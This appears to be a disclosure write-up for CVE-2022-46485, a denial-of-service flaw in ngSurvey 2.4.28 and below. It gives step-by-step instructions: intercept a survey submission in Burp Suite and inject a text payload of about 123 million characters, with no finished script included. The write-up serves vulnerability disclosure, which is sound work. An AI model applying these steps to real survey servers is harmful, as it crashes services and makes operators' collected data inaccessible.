ngSurvey version 2.4.28 and below is vulnerable to Denial of Service if a survey contains a "Text Field", "Comment Field" or "Contact Details". The issue exists because the fields do not include a character limit. An attacker can submit an infinite number of characters in the fields. During the testing, the docker application crashed while submitting the request. The survey's answer was still submitted in other cases. When the ngSurvey admin tries to view respondent's data or to perform an export, the web browser uses excessive amount of RAM or the server returns an internal error (500). Making the survey's data inaccessible, at least from the web interface. Even if the ngSurvey admin sets a character limit on the answer, the exploit is still possible because the check is only performed on the client-side browser.

> Notes: The "slider" question may also be vulnerable with a large integer instead of a string. It could not be confirmed in my local environment.

**Exploitation steps**

*   Open the survey page and find a text or comment field.
*   Fill the survey normally. In the text or comment field, type dospayload (anything else will work but I will be using this string for demonstration).
*   Click "Submit" but intercept the request with Burp Suite.
*   Right-click the request > Extensions > Copy As Python-Requests > Copy as requests. (You need the Copy As Python-Requests extension, install it from the BApp Store)
*   Paste the code in a new file.
*   Under import requests, add the following code dospayload= "A" * 123456789.
*   Find the text/comment answer in the burp0_json. It will look like this "value" : "dospayload".
*   Remove the double quotes to make it look like this "value" : dospayload.
*   If you want to check the response, store the request in a variable and print the status\_code and content.
*   Send it

The final code should look like this: 

**Why no PoC script ?**

I did not find a way to differentiate text or comment fields from other type of answers (single-choice, dropdown list, etc...). I believe they are identified by the application with their ID. If you find a way to make a working script that would take an URL as input and perform the exploitation steps, I'll be happy to reference it.

CVE-2022-46485: GitHub - WodenSec/CVE-2022-46485: An issue in Data Illusion Survey Software Solutions NGSurvey v2.4.28 and below allows attackers to cause a Denial of Service (DoS) via a crafted survey.

Tag

#js